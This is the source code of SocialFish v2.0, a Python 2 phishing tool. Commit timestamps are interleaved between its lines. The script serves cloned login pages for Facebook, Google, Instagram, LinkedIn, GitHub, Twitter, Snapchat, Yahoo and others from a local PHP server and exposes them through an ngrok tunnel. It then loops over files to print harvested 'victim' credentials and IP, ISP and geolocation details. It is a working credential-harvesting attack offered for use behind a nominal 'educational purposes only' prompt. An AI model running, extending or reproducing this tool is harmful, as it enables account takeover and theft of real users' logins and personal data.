2018-03-26 22:24:30 +08:00
#!/usr/bin/python2.7
#-*- coding: utf-8 -*-
# SOCIALFISH v2.0
# by: An0nUD4Y
#
###########################
from time import sleep
from sys import stdout , exit
from os import system , path
2018-06-03 18:58:52 +08:00
from distutils . dir_util import copy_tree
2018-03-26 22:24:30 +08:00
import multiprocessing
from urllib import urlopen
from platform import system as systemos , architecture
from wget import download
RED , WHITE , CYAN , GREEN , END = ' \033 [91m ' , ' \33 [46m ' , ' \033 [36m ' , ' \033 [1;32m ' , ' \033 [0m '
def connected ( host = ' http://duckduckgo.com ' ) :
try :
urlopen ( host )
return True
except :
return False
if connected ( ) == False :
print '''
. . . . . _____ . . . . . . . ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/ | [ __ | | | | | __ | | | ___ | [ __ | __ |
\o__ / \| ___ ] | __ | | ___ | | | | ___ | | ___ ] | |
\|
{ 0 } [ { 1 } ! { 0 } ] { 1 } Network error . Verify your connection . \n
''' .format(RED, END)
exit ( 0 )
def checkNgrok ( ) :
if path . isfile ( ' Server/ngrok ' ) == False :
print ' [*] Downloading Ngrok... '
2018-03-31 18:43:16 +08:00
ostype = systemos ( ) . lower ( )
2018-03-26 22:24:30 +08:00
if architecture ( ) [ 0 ] == ' 64bit ' :
2018-03-31 18:43:16 +08:00
filename = ' ngrok-stable- {0} -amd64.zip ' . format ( ostype )
2018-03-26 22:24:30 +08:00
else :
2018-03-31 18:43:16 +08:00
filename = ' ngrok-stable- {0} -386.zip ' . format ( ostype )
2018-03-26 22:24:30 +08:00
url = ' https://bin.equinox.io/c/4VmDzA7iaHb/ ' + filename
download ( url )
system ( ' unzip ' + filename )
system ( ' mv ngrok Server/ngrok ' )
system ( ' rm -Rf ' + filename )
system ( ' clear ' )
checkNgrok ( )
def end ( ) :
system ( ' clear ' )
print '''
S O C I A L { 2 }
| \ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O ~ - _ _ - ~ ~ ~ ~ - _
| > - - - - | - | - | - | - | - | - | - - | __ / / { 1 } DON ' T {2} )
| / / / / / / / / | __ \ < { 1 } FORGET { 2 } )
| / / / / / / / / \_ { 1 } ME ! { 2 } _ )
{ 1 } F I S H { 2 } ~ - - ___ - - ~
2018-04-22 21:49:23 +08:00
{ 0 } NOW WITH LIVE VICTIM ATTACK INFORMATION ]
2018-03-26 22:24:30 +08:00
{ 1 } [ { 0 } Some more phising pages have been added in script . For a better Attack ]
2018-04-25 19:37:30 +08:00
[ { 0 } Work Done By - - - - - - - - - - - - - - - - - - - - - - - - > An0nUD4Y ] \n ''' .format(GREEN, END, CYAN)
2018-03-26 22:24:30 +08:00
def loadModule ( module ) :
print ''' {0}
_ . - = - . _ . - ,
. ' " -., ' /
2018-04-25 19:37:30 +08:00
( AnonUD4Y _ . <
2018-03-26 22:24:30 +08:00
` = . ____ . = " `._ \\
[ { 1 } * { 0 } ] { 1 } % s module loaded . Building site . . . { 0 } ''' .format(CYAN, END) % module
def runPhishing ( social , option2 ) :
2018-04-25 19:37:30 +08:00
system ( ' sudo rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/iplog.txt ' )
2018-03-26 22:24:30 +08:00
if option2 == ' 1 ' and social == ' Facebook ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/fb_standard/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
if option2 == ' 2 ' and social == ' Facebook ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/fb_advanced_poll/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
if option2 == ' 3 ' and social == ' Facebook ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/mobile_fb/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
if option2 == ' 4 ' and social == ' Facebook ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/fb_security_fake/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
if option2 == ' 5 ' and social == ' Facebook ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/fb_messenger/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif option2 == ' 1 ' and social == ' Google ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/google_standard/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif option2 == ' 2 ' and social == ' Google ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/google_advanced_poll/ " , " Server/www/ " )
2018-04-24 13:31:09 +08:00
elif option2 == ' 3 ' and social == ' Google ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/google_advanced_web/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif social == ' LinkedIn ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/linkedin/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif social == ' GitHub ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/GitHub/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif social == ' StackOverflow ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/stackoverflow/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif social == ' WordPress ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/wordpress/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif social == ' Twitter ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/twitter/ " , " Server/www/ " )
2018-04-22 13:50:53 +08:00
elif social == ' Snapchat ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/Snapchat_web/ " , " Server/www/ " )
2018-04-24 22:21:51 +08:00
elif social == ' Yahoo ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/yahoo_web/ " , " Server/www/ " )
2018-04-26 19:09:54 +08:00
elif social == ' Twitch ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/twitch/ " , " Server/www/ " )
2018-03-26 22:24:30 +08:00
elif option2 == ' 1 ' and social == ' Instagram ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/Instagram_web/ " , " Server/www/ " )
2018-04-18 20:32:39 +08:00
elif option2 == ' 2 ' and social == ' Instagram ' :
2018-06-03 18:58:52 +08:00
copy_tree ( " WebPages/Instagram_autoliker/ " , " Server/www/ " )
2018-04-18 20:32:39 +08:00
2018-03-26 22:24:30 +08:00
def waitCreds ( ) :
print " {0} [ {1} * {0} ] {1} Hi Hacker Everything has been completed.............. Start HAcking " . format ( RED , END )
2018-04-22 21:49:23 +08:00
2018-03-26 22:24:30 +08:00
print ''' {0}
_ . - = - . _ . - ,
. ' " -., ' /
( AnonUD4Y_ ~ . <
2018-04-22 21:49:23 +08:00
` = . ____ . = " `._ \\
2018-04-25 19:37:30 +08:00
[ { 1 } * { 0 } ] { 1 } NOW YOU WILL GET YOUR VICTIM ' S LIVE INFORMATION .
[ { 1 } * { 0 } ] { 1 } GET VICTIM ' S IP ADDRESS, ISP, GEOLOCATION, CITY, COUNTRY, AND MANY MORE STUFF. {0} ' ' ' . format ( CYAN , END )
2018-03-26 22:24:30 +08:00
2018-04-22 21:49:23 +08:00
print " {0} [ {1} * {0} ] {1} Waiting for credentials & victim ' s info... \n " . format ( RED , END )
2018-03-26 22:24:30 +08:00
while True :
with open ( ' Server/www/usernames.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
2018-04-25 19:37:30 +08:00
print ' ====================================================================== ' . format ( RED , END )
2018-03-31 14:48:38 +08:00
print ' {0} [ CREDENTIALS FOUND ] {1} : \n {0} %s {1} ' . format ( GREEN , END ) % lines
2018-03-31 18:43:16 +08:00
system ( ' rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt ' )
2018-04-25 19:37:30 +08:00
print ' ====================================================================== ' . format ( RED , END )
print ' {0} ***** HOPE YOU ARE ENJOYING. SO PLEASE MAKE IT MORE POPULAR ***** {1} \n {0} {1} ' . format ( RED , END )
creds . close ( )
with open ( ' Server/www/iplog.txt ' ) as creds :
lines = creds . read ( ) . rstrip ( )
if len ( lines ) != 0 :
print ' ====================================================================== ' . format ( RED , END )
print ' {0} [ VICTIM INFO FOUND ] {1} : \n {0} %s {1} ' . format ( GREEN , END ) % lines
system ( ' rm -rf Server/www/iplog.txt && touch Server/www/iplog.txt ' )
print ' ====================================================================== ' . format ( RED , END )
2018-03-26 22:24:30 +08:00
creds . close ( )
def runPEnv ( ) :
system ( ' clear ' )
2018-03-31 14:48:38 +08:00
print ''' {2} - {1} An0nUD4Y {2} | {1} An0nUD4Y {2} | {1} An0nUD4Y {2} - INDIA
2018-04-25 19:37:30 +08:00
. . .
2018-03-26 22:24:30 +08:00
. ' . ' '
' ' ' ' '
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
. ' ' . . . . ' .. ' . ' .
' . . ' ' ' { 1 } v2 .0 { 2 }
' . . . . . ' . . ' ' .
2018-04-22 21:49:23 +08:00
' ' ' . ' { 1 } Updated_By - - > AnonUD4Y_ { 2 }
' {0} [ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
2018-03-31 14:48:38 +08:00
' . '
2018-03-26 22:24:30 +08:00
'
{ 1 } ''' .format(GREEN, END, CYAN)
for i in range ( 101 ) :
sleep ( 0.01 )
stdout . write ( " \r {0} [ {1} * {0} ] {1} Preparing environment... %d %% " . format ( CYAN , END ) % i )
stdout . flush ( )
print " \n \n {0} [ {1} * {0} ] {1} Searching for PHP installation... " . format ( CYAN , END )
if 256 != system ( ' which php ' ) :
print " -- {0} > {1} OK. " . format ( CYAN , END )
else :
print " -- {0} > {1} PHP NOT FOUND: \n {0} * {1} Please install PHP and run me again. http://www.php.net/ " . format ( RED , END )
exit ( 0 )
if raw_input ( " {0} [ {1} ! {0} ] {1} Do you agree to use this tool for educational purposes only? (y/n) \n {2} SF-An0nUD4Y > {1} " . format ( RED , END , CYAN ) ) . upper ( ) != ' Y ' :
system ( ' clear ' )
print ' \n [ {0} YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE! {1} ] \n ' . format ( RED , END )
exit ( 0 )
2018-04-26 19:09:54 +08:00
option = raw_input ( " \n Select an option: \n \n {0} [ {1} 1 {0} ] {1} Facebook \n \n {0} [ {1} 2 {0} ] {1} Google \n \n {0} [ {1} 3 {0} ] {1} LinkedIn \n \n {0} [ {1} 4 {0} ] {1} GitHub \n \n {0} [ {1} 5 {0} ] {1} StackOverflow \n \n {0} [ {1} 6 {0} ] {1} WordPress \n \n {0} [ {1} 7 {0} ] {1} Twitter \n \n {0} [ {1} 8 {0} ] {1} Instagram \n \n {0} [ {1} 9 {0} ] {1} Snapchat \n \n {0} [ {1} 10 {0} ] {1} Yahoo \n \n {0} [ {1} 11 {0} ] {1} Twitch \n \n {0} [ {1} -----> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y ! \n \n {0} SF-An0nUD4Y > {1} " . format ( CYAN , END ) )
2018-03-26 22:24:30 +08:00
if option == ' 1 ' :
loadModule ( ' Facebook ' )
option2 = raw_input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with) \n \n {0} [ {1} 3 {0} ] {1} Facebook Phishing- Mobile Version(mobile_mode) \n \n {0} [ {1} 4 {0} ] {1} Facebook Phishing- Fake Security issue(security_mode) \n \n {0} [ {1} 5 {0} ] {1} Facebook Phising-Messenger Credentials(messenger_mode) \n \n {0} [ {1} -----> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n \n {0} SF-An0nUD4Y > {1} " . format ( CYAN , END ) )
runPhishing ( ' Facebook ' , option2 )
elif option == ' 2 ' :
loadModule ( ' Google ' )
2018-04-24 13:31:09 +08:00
option2 = raw_input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Advanced Phishing(poll_mode/login_with) \n \n {0} [ {1} 3 {0} ] {1} New Google Web \n \n {0} [ {1} -----> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n \n {0} SF-An0nUD4Y > {1} " . format ( CYAN , END ) )
2018-03-26 22:24:30 +08:00
runPhishing ( ' Google ' , option2 )
elif option == ' 3 ' :
loadModule ( ' LinkedIn ' )
option2 = ' '
runPhishing ( ' LinkedIn ' , option2 )
elif option == ' 4 ' :
loadModule ( ' GitHub ' )
option2 = ' '
runPhishing ( ' GitHub ' , option2 )
elif option == ' 5 ' :
loadModule ( ' StackOverflow ' )
option2 = ' '
runPhishing ( ' StackOverflow ' , option2 )
elif option == ' 6 ' :
loadModule ( ' WordPress ' )
option2 = ' '
runPhishing ( ' WordPress ' , option2 )
elif option == ' 7 ' :
loadModule ( ' Twitter ' )
option2 = ' '
runPhishing ( ' Twitter ' , option2 )
elif option == ' 8 ' :
loadModule ( ' Instagram ' )
2018-04-18 20:32:39 +08:00
option2 = raw_input ( " \n Operation mode: \n \n {0} [ {1} 1 {0} ] {1} Standard Instagram Web Page Phishing \n \n {0} [ {1} 2 {0} ] {1} Instagram Autoliker Phising (After submit redirects to original autoliker) \n \n {0} [ {1} -------------> {0} ] {1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n \n {0} SF-An0nUD4Y > {1} " . format ( CYAN , END ) )
2018-04-22 13:50:53 +08:00
runPhishing ( ' Instagram ' , option2 )
elif option == ' 9 ' :
loadModule ( ' Snapchat ' )
option2 = ' '
2018-04-24 22:21:51 +08:00
runPhishing ( ' Snapchat ' , option2 )
elif option == ' 10 ' :
loadModule ( ' Yahoo ' )
option2 = ' '
2018-04-26 19:09:54 +08:00
runPhishing ( ' Yahoo ' , option2 )
elif option == ' 11 ' :
loadModule ( ' Twitch ' )
option2 = ' '
runPhishing ( ' Twitch ' , option2 )
2018-03-31 18:43:16 +08:00
else :
exit ( 0 )
2018-03-26 22:24:30 +08:00
def runNgrok ( ) :
2018-04-25 18:45:03 +08:00
system ( ' ./Server/ngrok http 1111 > /dev/null & ' )
2018-03-26 22:24:30 +08:00
sleep ( 10 )
2018-03-31 18:43:16 +08:00
system ( ' curl -s -N http://127.0.0.1:4040/status | grep " https://[0-9a-z]* \ .ngrok.io " -oh > ngrok.url ' )
2018-03-26 22:24:30 +08:00
url = open ( ' ngrok.url ' , ' r ' )
2018-04-25 19:37:30 +08:00
print ( ' \n {0} [ {1} * {0} ] {1} Ngrok URL: {2} ' + url . read ( ) + ' {1} ' ) . format ( CYAN , END , GREEN )
2018-03-26 22:24:30 +08:00
url . close ( )
def runServer ( ) :
2018-04-25 18:45:03 +08:00
system ( " cd Server/www/ && sudo php -S 127.0.0.1:1111 " )
2018-03-26 22:24:30 +08:00
if __name__ == " __main__ " :
try :
runPEnv ( )
runNgrok ( )
multiprocessing . Process ( target = runServer ) . start ( )
waitCreds ( )
except KeyboardInterrupt :
system ( ' pkill -f ngrok ' )
end ( )
2018-03-31 14:48:38 +08:00
exit ( 0 )